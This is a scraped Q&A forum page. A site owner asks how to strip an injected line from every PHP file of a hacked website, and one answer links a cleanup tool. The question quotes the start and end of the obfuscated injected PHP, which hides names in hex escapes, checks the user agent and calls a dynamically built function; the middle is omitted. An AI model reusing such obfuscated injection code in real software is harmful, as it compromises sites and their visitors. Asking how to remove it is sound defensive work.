Welcome to OStack Knowledge Sharing Community for programmer and developer-Open, Learning and Share
Welcome To Ask or Share your Answers For Others

Categories

0 votes
457 views
in Technique[技术] by (71.8m points)

php - Website hacked, how to remove malicious code with SED / GREP

a website of mine is hacked. In every php file a line of code is added. I wont post the complete code here, but it starts with:

<?php if(!isset($GLOBALS["x61156x75156x61"])) { $ua=strtolower($_SERVER["x48124x54120x5f125x53105x52137x41107x45116x54"]); if ((! strstr($ua,"x6d163x69145")) and (! strstr($ua,"x72166x3a61x31"))) $GLOBALS["x61156x75156x61"]=1; } ?><?php $yudqgxmnlr = 

and ends with:

 $gzagexgpdc=substr($yudqgxmnlr,(34129-24016),(83-71)); $gzagexgpdc($xarchajboj, $ukumkvvgai, NULL); $gzagexgpdc=$ukumkvvgai; $gzagexgpdc=(759-638); $yudqgxmnlr=$gzagexgpdc-1; ?>

I've tried finding and replacing with some ssh commands, but it doesnt seem to work. (Read: my lack of ssh knowledge gets in the way).

This is my latest atempt:

sed -i '<?php if(!isset*gzagexgpdc-1; ?>//g’ *.php

Can anyone help me?

See Question&Answers more detail:os

与恶龙缠斗过久,自身亦成为恶龙;凝视深渊过久,深渊将回以凝视…
Welcome To Ask or Share your Answers For Others

1 Answer

0 votes
by (71.8m points)

You can try this : https://github.com/daniyalahmadk/RMCI

Just need to put that code in box and hit submit, it will search code from files and remove them all once.


与恶龙缠斗过久,自身亦成为恶龙;凝视深渊过久,深渊将回以凝视…
Welcome to OStack Knowledge Sharing Community for programmer and developer-Open, Learning and Share
Click Here to Ask a Question

...